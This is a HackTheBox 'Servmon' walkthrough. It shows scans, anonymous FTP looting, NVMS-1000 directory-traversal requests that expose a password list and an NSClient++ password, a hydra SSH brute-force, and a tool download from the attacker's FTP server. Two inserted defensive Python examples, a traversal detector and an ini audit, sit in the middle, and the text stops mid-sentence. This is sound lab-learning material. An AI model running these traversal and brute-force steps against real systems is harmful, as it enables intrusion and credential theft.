HackTheBox – Servmon

Servmon is a recently retired box (11 Apr – 20 Jun) and though marked Easy it didn’t feel as easy as earlier Windows boxes, largely because of power creep: boxes become more difficult over time while retaining the same difficulty rating. The other problem was how unstable the box was; some ports weren’t reported open even though they should have been. I found this out only after I checked online and saw others had encountered the same problem. Without those running services, the box is unexploitable. Fortunately, after I switched regions I could see those services and proceed.

When doing this box you may find that Chromium loads quicker than Firefox on Kali, so I installed it.

Lessons learned

  • (Unintended) differences between HTB regions for the same box
  • amap being too old to reliably trust
  • Post-exploitation enumeration restrictions on recent Windows builds
  • Dealing with Windows AV for file-transfer

Enumeration

This was what I saw in the first region:

root@Kali:~/HTB/Servmon# masscan -p1-65535,U:1-65535 10.10.10.184 --rate=600 -e tun0

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2020-08-29 16:46:51 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 49667/tcp on 10.10.10.184                                 
Discovered open port 135/tcp on 10.10.10.184                                   
Discovered open port 445/tcp on 10.10.10.184                                   
Discovered open port 5040/tcp on 10.10.10.184                                  
Discovered open port 49666/tcp on 10.10.10.184                                 
Discovered open port 49668/tcp on 10.10.10.184                                 
Discovered open port 5666/tcp on 10.10.10.184                                  
Discovered open port 7680/tcp on 10.10.10.184                                  
Discovered open port 49665/tcp on 10.10.10.184                                 
Discovered open port 21/tcp on 10.10.10.184                                    
Discovered open port 49664/tcp on 10.10.10.184                                 
Discovered open port 49669/tcp on 10.10.10.184                                 
Discovered open port 8443/tcp on 10.10.10.184                                  
Discovered open port 22/tcp on 10.10.10.184                                    
Discovered open port 49670/tcp on 10.10.10.184    

After switching regions, port 80 appears (along with 139, 6063 and 6699):

root@Kali:~/HTB/Servmon# masscan -p1-65535,U:1-65535 10.10.10.184 --rate=600 -e tun0

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2020-08-30 06:26:37 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 7680/tcp on 10.10.10.184                                  
Discovered open port 49667/tcp on 10.10.10.184                                 
Discovered open port 49669/tcp on 10.10.10.184                                 
Discovered open port 49670/tcp on 10.10.10.184                                 
Discovered open port 5666/tcp on 10.10.10.184                                  
Discovered open port 8443/tcp on 10.10.10.184                                  
Discovered open port 445/tcp on 10.10.10.184                                   
Discovered open port 80/tcp on 10.10.10.184                                    
Discovered open port 139/tcp on 10.10.10.184                                   
Discovered open port 49664/tcp on 10.10.10.184                                 
Discovered open port 49668/tcp on 10.10.10.184                                 
Discovered open port 135/tcp on 10.10.10.184                                   
Discovered open port 49665/tcp on 10.10.10.184                                 
Discovered open port 21/tcp on 10.10.10.184                                    
Discovered open port 22/tcp on 10.10.10.184                                    
Discovered open port 5040/tcp on 10.10.10.184                                  
Discovered open port 6063/tcp on 10.10.10.184                                  
Discovered open port 49666/tcp on 10.10.10.184                                 
Discovered open port 6699/tcp on 10.10.10.184   

I spent a lot of time applying the right exploits to the wrong port only to discover this. The running services and ports are here.

FTP

We see an FTP server running, so run nmap’s FTP scripts against it:

root@Kali:~/HTB/Servmon# nmap -Pn -n -sV -p21 --script=ftp* 10.10.10.184 -e tun0
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 01:14 +08
NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument.
Nmap scan report for 10.10.10.184
Host is up (0.0053s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM                 Users
| ftp-brute: 
|   Accounts: No valid accounts found
|_  Statistics: Performed 50009 guesses in 93 seconds, average tps: 537.1
| ftp-syst: 
|_  SYST: Windows_NT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.50 seconds

This tells us anonymous access is allowed. So I logged in, found some notes and downloaded them:

root@Kali:~/HTB/Servmon# ftp -p 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> pwd
257 "/" is current directory.
ftp> dir
227 Entering Passive Mode (10,10,10,184,194,11).
125 Data connection already open; Transfer starting.
01-18-20  12:05PM                 Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> dir
227 Entering Passive Mode (10,10,10,184,194,12).
125 Data connection already open; Transfer starting.
01-18-20  12:06PM                 Nadine
01-18-20  12:08PM                 Nathan
226 Transfer complete.
ftp> cd Nadine
250 CWD command successful.
ftp> dir
227 Entering Passive Mode (10,10,10,184,194,15).
125 Data connection already open; Transfer starting.
01-18-20  12:08PM                  174 Confidential.txt
226 Transfer complete.
ftp> mget Confidential.txt
mget Confidential.txt? Y
227 Entering Passive Mode (10,10,10,184,194,20).
125 Data connection already open; Transfer starting.
226 Transfer complete.
174 bytes received in 0.00 secs (35.9851 kB/s)
ftp> cd ..
250 CWD command successful.
ftp> dir
227 Entering Passive Mode (10,10,10,184,194,21).
125 Data connection already open; Transfer starting.
01-18-20  12:06PM                 Nadine
01-18-20  12:08PM                 Nathan
226 Transfer complete.
ftp> cd Nathan
250 CWD command successful.
ftp> dir
227 Entering Passive Mode (10,10,10,184,194,22).
125 Data connection already open; Transfer starting.
01-18-20  12:10PM                  186 Notes to do.txt
226 Transfer complete.
ftp> mget "Notes to do.txt"
mget Notes to do.txt? Y
227 Entering Passive Mode (10,10,10,184,194,24).
125 Data connection already open; Transfer starting.
226 Transfer complete.

Apart from these I also tested whether directory traversal (cd ../../../../) was possible over FTP; it wasn’t. The notes read (with added newlines):

root@Kali:~/HTB/Servmon# cat Confidential.txt 
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

root@Kali:~/HTB/Servmon# cat 'Notes to do.txt' 
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

Ok, so we know a few things. First, there’s a Passwords.txt on Nathan’s desktop which we can’t reach with anonymous FTP (I tried dir -a). Then we see references to NVMS and NSClient, a clue as to what software may be running.

SMB

Couldn’t find anything here. No null sessions were available. Afternote: when I was done with the box and watched IppSec’s video, he shows that the discovered passwords worked with SMB.

root@Kali:~/HTB/Servmon# smbmap -H 10.10.10.184
[+] Finding open SMB ports....
[!] Authentication error occured
[!] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
[!] Authentication error on 10.10.10.184

root@Kali:~/HTB/Servmon# smbclient --no-pass -L //10.10.10.184
WARNING: The "syslog" option is deprecated
WARNING: The "syslog" option is deprecated
session setup failed: NT_STATUS_ACCESS_DENIED

Web services

Port 8443

I tried 8443 first (since I didn’t discover 80 until later) and found that amap (which was pretty old) didn’t identify this web service properly:

root@Kali:~/HTB/Servmon# amap 10.10.10.184 8443
amap v5.4 (www.thc.org/thc-amap) started at 2020-08-30 01:34:25 - APPLICATION MAPPING mode


Unidentified ports: 10.10.10.184:8443/tcp (total 1).

amap v5.4 finished at 2020-08-30 01:34:31
root@Kali:~/HTB/Servmon# curl http://10.10.10.184:8443/
curl: (56) Recv failure: Connection reset by peer

Nor did curl get redirected to the HTTPS site. But if you explicitly enter https://10.10.10.184:8443 you’ll see this

Strangely there’s no username required, and I tried some obvious passwords like nadine, nathan, servmon, admin, password etc., none of which worked. Googling NSClient tells us it’s a monitoring agent, which fits the name Servmon pretty well. I couldn’t find any default passwords for NSClient either. searchsploit returns this:

root@Kali:~/HTB/Servmon# searchsploit nsclient
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                      |  Path
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
NSClient++ 0.5.2.35 - Authenticated Remote Code Execution                                                           | json/webapps/48360.txt
NSClient++ 0.5.2.35 - Privilege Escalation                                                                          | windows/local/46802.txt
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

But neither appears relevant: we don’t have creds, nor are we already in. dirbuster hung when I tried it, and in any case it didn’t find much.

Port 80

Page loaded this

Similarly we don’t have any passwords, and in any case Nathan’s note says they’ve been changed. searchsploit returned something interesting:

root@Kali:~/HTB/Servmon# searchsploit nvms
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                      |  Path
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
NVMS 1000 - Directory Traversal                                                                                     | hardware/webapps/47774.txt
OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification                                                    | multiple/local/21856.txt
OpenVms 8.3 Finger Service - Stack Buffer Overflow                                                                  | multiple/dos/32193.txt
TVT NVMS 1000 - Directory Traversal                                                                                 | hardware/webapps/48311.py
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

The last result, a Python exploit, was published a day after the box was released, so it’s probably not right to use it, since it would have been written just for the box. It seemed to be an automated version of the first result anyway. We can try this in Burp Repeater:

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: dataPort=6063
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Content-type: 
Content-Length: 92
Connection: close
AuthInfo: 

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Ok, we managed to do an LFI on Windows (an arbitrary file read via directory traversal). Now what would be interesting is what else we could view. Nadine’s note says that Passwords.txt was on Nathan’s desktop.

GET /../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: dataPort=6063
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Content-type: text/plain
Content-Length: 156
Connection: close
AuthInfo: 

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
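
From the defender’s side, the two requests above are exactly what a web access log would show. This is an added example, not code from the write-up or from NVMS-1000: it URL-decodes each request path, walks its segments, flags any request whose ".." segments climb above the web root, and reports the file the request would reach and whether it is a known sensitive Windows target. The log lines are constructed for this example (method, path, status); two of the paths are the ones sent to NVMS above.

```python
"""Path-traversal detector for simplified web access logs (added example)."""
from urllib.parse import unquote

# Files typically read first to confirm a traversal; the last two are the
# ones that mattered on this box.
SENSITIVE_TARGETS = ("windows/win.ini", "passwords.txt", "nsclient.ini")

# Constructed sample log, one "METHOD PATH STATUS" record per line.
SAMPLE_LOG = """\
GET /index.html 200
GET /../../../../../../../../../../../../windows/win.ini 200
GET /../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt 200
GET /images/logo.png 200
GET /%2e%2e/%2e%2e/%2e%2e/windows/win.ini 404
GET /docs/../index.html 200
"""


def analyse_path(raw_path):
    """Return (escapes_root, resolved_path, sensitive) for one request path."""
    # Decode twice so double-encoded dots (%252e) are caught too, and treat
    # backslashes as separators, as a Windows server would.
    path = unquote(unquote(raw_path)).replace("\\", "/")
    stack = []
    escapes = False
    for seg in path.split("/"):
        if seg == "..":
            if stack:
                stack.pop()
            else:
                # ".." with nothing left to pop climbs above the web root;
                # a server that allows this maps the rest onto the drive root.
                escapes = True
        elif seg not in ("", "."):
            stack.append(seg)
    resolved = "/" + "/".join(stack)
    sensitive = any(resolved.lower().endswith(t) for t in SENSITIVE_TARGETS)
    return escapes, resolved, sensitive


def scan_log(log_text):
    """Return one alert dict per request that escapes the web root."""
    alerts = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        method, raw_path, status = parts[0], parts[1], parts[2]
        escapes, resolved, sensitive = analyse_path(raw_path)
        if not escapes:
            continue
        alerts.append({
            "method": method,
            "raw": raw_path,
            "resolved": resolved,
            "sensitive": sensitive,
            # A 2xx on a traversal means the server actually served the file.
            "served": status.startswith("2"),
        })
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        flag = "SENSITIVE" if a["sensitive"] else "traversal"
        state = "served" if a["served"] else "blocked"
        print(f"[{flag}] {a['method']} {a['raw']} -> {a['resolved']} ({state})")
```

Only requests that actually climb above the root are reported, so an in-root "/docs/../index.html" stays quiet while the encoded variant is still caught.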

We got a bunch of passwords. I tried them with the NSClient login, but none succeeded. Although not necessary at this stage, I had a look at the earlier privilege-escalation exploit for NSClient; it says the web administrator password is stored in c:\program files\nsclient++\nsclient.ini, so I used the LFI to view it. We can see the password, and also understand why the login returned a 403 not allowed error instead: only localhost is permitted to log in.

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1
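
The two keys above are what decide who can reach the NSClient++ web interface and what a file-read bug like the one on port 80 hands over. This is an added example, not part of the write-up or of NSClient++: a minimal parser for the ini format shown (";" comments, [section] headers, "key = value" pairs) and an audit of those two keys. The sample ini is constructed, the section name is an assumption, the password is a placeholder, and the extra allowed host is added to show a finding.

```python
"""Audit an nsclient.ini for web-UI exposure (added example)."""

# Entries in "allowed hosts" that keep the UI reachable only from the box itself.
LOOPBACK = {"127.0.0.1", "::1", "localhost"}

# Constructed sample; section name assumed, password a placeholder,
# 10.10.14.18 added as a constructed non-loopback entry.
SAMPLE_INI = """\
[/settings/default]
; Undocumented key
password = EXAMPLE-PASSWORD-PLACEHOLDER

; Undocumented key
allowed hosts = 127.0.0.1, 10.10.14.18
"""


def parse_ini(text):
    """Return {section: {key: value}}; keys before any [section] go under ''."""
    sections, current = {"": {}}, ""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";") or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def audit(sections):
    """Return findings: non-loopback access, or a readable cleartext password."""
    findings = []
    for name, keys in sections.items():
        hosts = [h.strip() for h in keys.get("allowed hosts", "").split(",") if h.strip()]
        remote = [h for h in hosts if h not in LOOPBACK]
        if remote:
            findings.append(f"{name}: allowed hosts permits non-loopback {remote}")
        if keys.get("password"):
            # Stored in cleartext, so any file-read bug on the host exposes it;
            # the file's ACL and the password's uniqueness are what protect it.
            findings.append(f"{name}: cleartext web password present in nsclient.ini")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_ini(SAMPLE_INI)):
        print(finding)
```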

Exploitation – SSH login

We still have SSH to test. It’s an odd service to find running on Windows, but anyway. We have two usernames and a list of passwords, so let’s use hydra to try the SSH logins; hopefully it doesn’t lock us out.

root@Kali:~/HTB/Servmon# cat users.txt 
Nadine
Nathan
root@Kali:~/HTB/Servmon# cat Passwords.txt 
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

root@Kali:~/HTB/Servmon# hydra -L users.txt -P Passwords.txt 10.10.10.184 -t 4 ssh
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-30 17:53:59
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14 login tries (l:2/p:7), ~4 tries per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184   login: Nadine   password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-30 17:54:03

root@Kali:~/HTB/Servmon# ssh nadine@10.10.10.184
nadine@10.10.10.184's password: 

Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>

Great, we’re in. Getting winPEAS to run was quite a headache. I found quickly that commands like systeminfo and tasklist were blocked:

nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>tasklist
ERROR: Access denied

which is increasingly true of newer Windows boxes. Ok, let’s check the .NET version:

nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>dir C:\Windows\Microsoft.NET\Framework
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Windows\Microsoft.NET\Framework

19/03/2019  05:52    <DIR>          .
19/03/2019  05:52    <DIR>          ..
19/03/2019  05:46             7,680 sbscmp10.dll
19/03/2019  05:46             7,680 sbscmp20_mscorwks.dll
19/03/2019  05:46             7,680 sbscmp20_perfcounter.dll
19/03/2019  05:46             7,680 sbs_diasymreader.dll
19/03/2019  05:46             7,680 sbs_microsoft.jscript.dll
19/03/2019  05:46             7,680 sbs_mscordbi.dll
19/03/2019  05:46             7,680 sbs_mscorrc.dll
19/03/2019  05:46             7,680 sbs_mscorsec.dll
19/03/2019  05:46             7,680 sbs_system.configuration.install.dll
19/03/2019  05:46             7,680 sbs_system.data.dll
19/03/2019  05:46             7,680 sbs_system.enterpriseservices.dll
19/03/2019  05:46             7,680 sbs_wminet_utils.dll
19/03/2019  05:46             7,680 SharedReg12.dll
08/04/2020  23:21    <DIR>          v1.0.3705
08/04/2020  23:21    <DIR>          v1.1.4322
19/03/2019  05:52    <DIR>          v2.0.50727
30/08/2020  07:36    <DIR>          v4.0.30319
              13 File(s)         99,840 bytes
               6 Dir(s)  27,495,735,296 bytes free

4.0, so we have to use an older compiled winPEAS (the current one requires 4.5). Here I encountered a bunch of problems: I couldn’t download winPEAS with certutil or transfer it with smbserver.py because Windows antivirus blocked it. What worked was what I discovered with Anthem, namely downloading over FTP.

nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>ftp
ftp> open 10.10.14.18
Connected to 10.10.14.18.
220 pyftpdlib 1.2.0 ready.
530 Log in with USER and PASS first.
User (10.10.14.18:(none)): anonymous
331 Username ok, send password.
Password: 
230 Login successful.
ftp> GET winPEASany.exe
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
ftp: 237698 bytes received in 0.66Seconds 358.52Kbytes/sec.
ftp> quit
221 Goodbye.

On Kali, run the FTP server:

root@Kali:~/HTB/Servmon# python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:262: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 20-08-30 18:31:15] >>> starting FTP server on 0.0.0.0:21, pid=18441 <<<
[I 20-08-30 18:31:15] poller: 
[I 20-08-30 18:31:15] masquerade (NAT) address: None
[I 20-08-30 18:31:15] passive ports: None
[I 20-08-30 18:31:15] use sendfile(2): True
[I 20-08-30 18:31:45] 10.10.10.184:49721-[] FTP session opened (connect)
[I 20-08-30 18:31:55] 10.10.10.184:49721-[anonymous] USER 'anonymous' logged in.
[I 20-08-30 18:32:20] 10.10.10.184:49721-[anonymous] RETR /root/HTB/Servmon/winPEASany.exe completed=1 bytes=237698 seconds=0.694
[I 20-08-30 18:32:26] 10.10.10.184:49721-[anonymous] FTP session closed (disconnect).

Here, as SSH provides an interactive shell, we can use FTP directly; otherwise, in a non-interactive remote shell, we can do what was done in Anthem, namely putting all the commands in one txt file and running FTP on that. Once I found a way to download files to the box, I hunted for a version of winPEAS which worked. The non-functional ones returned this error:

nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>winPEASx64.exe cmd > winpeas.txt
This version of C:\Users\Nadine\AppData\Local\Temp\winPEASx64.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher.

I tried a few more; this one ended up working.

nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>winPEAS.exe cmd > winpeas.txt
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine\AppData\Local\Temp

30/08/2020  11:37    <DIR>          .
30/08/2020  11:37    <DIR>          ..
30/08/2020  11:24            59,392 nc.exe
30/08/2020  11:37           231,424 winPEAS.exe
30/08/2020  11:38           144,095 winpeas.txt
30/08/2020  11:32           237,698 winPEASany.exe
30/08/2020  11:35           237,186 winPEASx64.exe
               5 File(s)        909,795 bytes
               2 Dir(s)  27,495,587,840 bytes free

Other file transfer methods

I tested other file transfer methods; findings here. In conclusion, stick with PowerShell’s DownloadFile method, FTP and scp (if Windows OpenSSH is installed). Unfortunately winPEAS was quite uninformative this time round; it didn’t highlight any potentially exploitable vector. If you paid really close attention to non-Microsoft services you might see this:

    NSClient++ Monitoring Agent(MySolutions Nordic (Michael Medin) - NSClient++ Monitoring Agent)["C:\Program Files\NSClient++\nscp.exe" service --run --name nscp] - Autoload
    Monitoring agent for nagios (and others) used to respond to status queries

Restricted enumeration

But in general winPEAS had a hard time because the way it lists services is via PowerShell’s Get-Service:

nadine@SERVMON C:\Users\Nadine\Downloads>powershell.exe "Get-Service"
Get-Service : Cannot open Service Control Manager on computer '.'. This operation might require other privileges.
At line:1 char:1
+ Get-Service
+ ~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Get-Service], InvalidOperationException
    + FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.GetServiceCommand

and in winPEAS we see:

[X] Exception: Access denied 
System.InvalidOperationException: Cannot open Service Control Manager on computer '.'. This operation might require other privileges. ---> System.ComponentModel.Win32Exception: Access is denied
   --- End of inner exception stack trace ---
   at System.ServiceProcess.ServiceController.GetDataBaseHandleWithAccess(String machineName, Int32 serviceControlManaqerAccess)
   at System.ServiceProcess.ServiceController.GetDataBaseHandleWithEnumerateAccess(String machineName)
   at System.ServiceProcess.ServiceController.GetServicesOfType(String machineName, Int32 serviceType)
   at System.ServiceProcess.ServiceController.GetServices()
   at d5.c(Dictionary`2 A_0)
   at d4.bs()

Commands like systeminfo, tasklist are restricted as well.

nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>tasklist
ERROR: Access denied

But some things do work in PowerShell, such as Get-Process:

nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>Powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\Nadine\AppData\Local\Temp>

PS C:\Users\Nadine\AppData\Local\Temp> Get-Process

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    443      25    14560      31028              6252   1 ApplicationFrameHost
    269      13     2464      13444              6704   1 browser_broker
     89       5     2884       4688       0.48    604   0 cmd
    107       6     2572       4424       0.06   4332   0 cmd
    152      10     6728      12708       0.13   6376   0 conhost
    157      10     6700      13004              7728   0 conhost
    110       6     1300       5236       3.70   7956   0 conhost
    619      21     1752       5196               408   0 csrss
    400      17     1612       4756               496   1 csrss
    386      15     3740      13764              4616   1 ctfmon
    256      14     3924      13264              3564   0 dllhost
    789      40    37732      71228               976   1 dwm
   1649      62    24492      93060              5620   1 explorer
     32       7     3404       7656               740   1 fontdrvhost
     32       5     1340       3760               748   0 fontdrvhost
      0       0       60          8                 0   0 Idle
   1157      23     5220      15528               636   0 lsass
    173      15     4224      11460              2752   0 ManagementAgentHost
      0       0      160      10412              1536   0 Memory Compression
    760      45    39012      28220              7464   1 Microsoft.Photos
    835      45    20068      72432              6328   1 MicrosoftEdge
    488      20     5808      25280              7044   1 MicrosoftEdgeCP
    263      13     3832      13000              5328   1 MicrosoftEdgeSH
    221      13     2828       9972              4644   0 msdtc
    739      71   177420     186952              2776   0 MsMpEng
    137       9     1148       8748       0.16   3156   0 nc
    192      33     3392       9264              4400   0 NisSrv
    352      23     7348      19484              2660   0 nscp
   2526     357   347536     118644              8080   1 NVMS-1000
    624      34    96216     108592       4.31   7604   0 powershell
      0      15     4572      26712                88   0 Registry
    289      17     5416      21996               988   1 RuntimeBroker
    126       8     1516       7408              1564   1 RuntimeBroker
    133       9     1624       8128              2628   1 RuntimeBroker
    407      19     6212      21204              2764   1 RuntimeBroker
    215      11     2500      16016              6160   1 RuntimeBroker
    139       8     1528       7400              6932   1 RuntimeBroker
    269      14     2984      15296              7340   1 RuntimeBroker
    255      16     4860      16324              8136   1 RuntimeBroker
    776      43    19960      28332              2740   0 SearchIndexer
   1072      68    71472     135400              4088   1 SearchUI
    226      11     2736      14996              4224   1 SecurityHealthHost
    410      16     4140      15512              6108   0 SecurityHealthService
    154      10     1704       8828              7812   1 SecurityHealthSystray
    641      11     4952       9592               628   0 services
     89       6     3192       5964              3644   0 SgrmBroker
    574      26    10664      45388              6440   1 ShellExperienceHost
    555      18     6096      24768              3232   1 sihost
     53       3     1148       1036               312   0 smss
    422      21     5108      14748              2076   0 spoolsv
    109      12     1712       6788              2688   0 sshd
    120       9     2136       7044       0.89   6872   0 sshd
    113       9     2040       7180              7716   0 sshd
    588      27    18200      58148               648   1 StartMenuExperienceHost
    157       7     1404       5704               332   0 svchost
    287      13     3188      10832               340   0 svchost
    158      10     1940      12136               596   0 svchost
    214      12     2156      10040               660   0 svchost
     86       5      908       3752               756   0 svchost
   1169      22    11628      28836               828   0 svchost
   1116      17     7048      14252               880   0 svchost
    249      10     2172       7892               924   0 svchost
    198      12     2184      12136               968   0 svchost
    485      28     9328      19108              1032   0 svchost
    415      14    13888      16632              1088   0 svchost
    127       8     1412       7092              1152   0 svchost
    138      19     3848       7796              1176   0 svchost
    206      12     1692       7324              1192   0 svchost
    219      10     2104       7244              1228   0 svchost
    175       7     1248       5588              1352   0 svchost
    226      13     2584      11784              1360   0 svchost
    438       9     2900       8932              1368   0 svchost
    242      12    34076      41512              1376   0 svchost
    389      17     5640      15172              1468   0 svchost
    367      15     4260      11828              1576   0 svchost
    177      11     1864       8292              1600   0 svchost
    267      13     2860       7740              1620   0 svchost
    144       9     1516       6996              1708   0 svchost
    175      10     1948       8064              1728   0 svchost
    363      10     2584       8448              1840   0 svchost
    211      10     1972       8532              1872   0 svchost
    274      16     5564      19500              1884   0 svchost
    190      15     6088       9844              1912   0 svchost
    258      11     2576       9948              1944   0 svchost
    126      10     1540       6252              1956   0 svchost
    358      14     2268       9444              1968   0 svchost
    225      12     2256      10916              2088   0 svchost
    166       9     1772       6992              2124   0 svchost
    428      32     9780      18908              2140   0 svchost
    187      11     1984       8056              2196   0 svchost
    263      13     2604       7700              2392   0 svchost
    166      12     1660       7172              2400   0 svchost
    203      23     2696      10092              2516   0 svchost
    443      22    13944      28348              2524   0 svchost
    344      21    27292      32352              2536   0 svchost
    336      15     4524      11796              2556   0 svchost
    421      16     8440      18568              2576   0 svchost
    286      13     3748      15648              2640   1 svchost
    209      12     2392       8768              2652   0 svchost
    135       9     1552       6380              2672   0 svchost
    128       7     1272       5344              2716   0 svchost
    241      12     3128      17128              2804   0 svchost
    483      18     3500      12724              2876   0 svchost
    136       8     1584       6004              2896   0 svchost
    378      23     3280      12000              3148   0 svchost
    293      17     4192      15044              3256   0 svchost
    307      18     4976      16596              3544   0 svchost
    389      19     6600      39044              4104   1 svchost
    253      13     3116      14520              4292   0 svchost
    180       9     4532      12580              4480   0 svchost
    169       9     1740       7836              4508   0 svchost
    222      13     2880      12304              4528   0 svchost
    340      42     4808      15808              4840   0 svchost
    218      15     1968       7152              5132   0 svchost
    241      12     3012      16132              5672   1 svchost
    399      67    14716      20248              5812   0 svchost
    190      12     2744      14848              6216   0 svchost
    239      13     2852      11952              7120   0 svchost
    227      12     2520       9732              7436   0 svchost
    454      25     5024      20116              7524   1 svchost
    188      10     3192       7660              7896   0 svchost
    120       7     1324       5672              8004   0 svchost
   2565       0      196         64                 4   0 System
    794      36    18324        660              2244   1 SystemSettings
    260      27     4904      13796              4204   1 taskhostw
    269      17     5104      14644              5488   1 taskhostw
    483      21    33228      51996              7748   0 usocoreworker
    178      13     4816      12924              2744   0 VGAuthService
    407      24     9524      21840              2816   0 vmtoolsd
    279      20     4300      16660              7880   1 vmtoolsd
    129       9     1292       6780              5912   1 WatchDog
    156      11     1312       6496               484   0 wininit
    271      13     2908      12924               568   1 winlogon
    524      36    15064        396              5908   1 WinStore.App
    152       9     1564       7604              3528   0 WmiApSrv
    345      16     9744      18636              3844   0 WmiPrvSE
    463      24    12024       5360              7152   1 YourPhone
    240      13     3304      14496              4328   1 YourPhoneServer

winPEAS also highlights that nadine’s PowerShell history file is readable, which (in hindsight, at least) actually tells us how to escalate privileges.

Priv esc

Priv esc for this box was quite tough, largely because the exploit write-up was quite difficult to follow (no screenshots or explanation of what was done). Plus, if you read this comment on IppSec’s video by the creator of the box, he says that the intended route was actually through a RESTful API call, without even needing to log in to NSClient++. Nevertheless IppSec shows how to do it, and this is my summary:

